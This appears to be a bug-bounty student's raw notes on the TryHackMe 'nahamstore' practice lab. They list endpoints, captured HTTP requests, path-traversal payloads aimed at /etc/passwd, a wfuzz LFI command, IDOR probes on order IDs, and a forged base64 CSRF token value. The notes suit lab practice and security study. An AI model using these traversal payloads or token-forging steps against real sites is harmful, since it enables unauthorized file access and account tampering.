nahamstore

nahamsec's bugbounty udemy course is great and there's also a room on THM.
// nahamstore endpoints discovered and possible attacks

curl -X POST "http://nahamstore-2020-dev.nahamstore.thm/api/customers/" -H "Content-Type: application/json" -d "{\"customer_id\":\"1\"\"}"


http://marketing.nahamstore.thm/?error=
http://nahamstore.thm/product/picture/?file=.../.../.../etc/passwd
http://nahamstore.thm/account/orders/5
http://marketing.nahamstore.thm/09c2afcff60bb4dd3af7c5c5d74a482f
http://nahamstore.thm/staff
http://nahamstore.thm/basket?deleteid=1
http://nahamstore.thm/account/addressbook?redirect_url=/basket

http://nahamstore.thm/account/addressbook/?delete_address_id=6
http://nahamstore.thm/returns/2?auth=../../lfi/flag.txt

http://nahamstore.thm/account/orders/5

http://nahamstore.thm/account/orders/5

http://nahamstore-2020-dev.nahamstore.thm/api/customers/

===================================================================

POST /login?redirect_url=/orders HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/login?redirect_url=/orders
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close
Cookie: token=ba9cb3780122efab870aad3e2bf35c73; session=931d2ee7aa3c54fdac481150bdff3ef1
Upgrade-Insecure-Requests: 1

login_email=test%40test.com&login_password=test123

======================================================================================


wfuzz -c -w ./lfi-include.txt --hw 0 http://nahamstore.thm/product/picture/?file=../../../../../../../FUZZ

wfuzz
http://nahamstore.thm/product/picture/?file=

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


..././..././..././..././..././..././..././..././etc/passwd

Content-Disposition: form-data; name="timesheet"; filename="file_example_XLS_10.xls"
Content-Type: application/vnd.ms-excel


Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet


Content-Disposition: form-data; name="timesheet"; filename="time.xlsx"
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

%2e%2e
%2f%2e%2e%2fetc%2fpasswd

Order does not belong to this user_id

==========================================
bunch of additional responses:
GET / HTTP/1.1

Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/account/settings
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1

=====================================
POST /product?id=1 HTTP/1.1

Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/product?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1

add_to_basket=1&discount=123456
===============================================
GET /product?id=1&added=1 HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/product?id=1
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1

----------------------------------------------------
POST /account/addressbook?redirect_url=/basket HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/account/addressbook?redirect_url=/basket
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1


new_address_title=Mr&new_address_fname=Test&new_address_lname=tester&new_address_line1=123+sesame+street&new_address_line2=sesame+building&new_address_line3=spokane&new_address_state=washington&new_address_zipcode=54321
-----------------------------------------------------------------------------------

POST /basket HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/basket
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1

address_id=5

order 5
http://nahamstore.thm/account/orders/5
$120




action=disable&csrf_disable_protect=Ng%3D%3D

Ng==  (base64 decoded):
6



action=disable&csrf_disable_protect=Ng%3D%3D


NQ%3D%3D


POST /account/settings/disable HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/account/settings/disable
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close
Cookie: session=57ddd41373b98c9c03fe7a8d7f0daf28; token=54dfc1f9ee290de7a3342d03cf816e2d
Upgrade-Insecure-Requests: 1
action=disable&csrf_disable_protect=MTA%3D



POST /basket HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/basket
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Connection: close
Cookie: session=57ddd41373b98c9c03fe7a8d7f0daf28; token=fb15f2cedf08b171dcc0c1c5aac4919d
Upgrade-Insecure-Requests: 1
address_id=5&card_no=1234123412341234
PreviousXXE Nextreset links
Last updated 2 years ago
Was this helpful?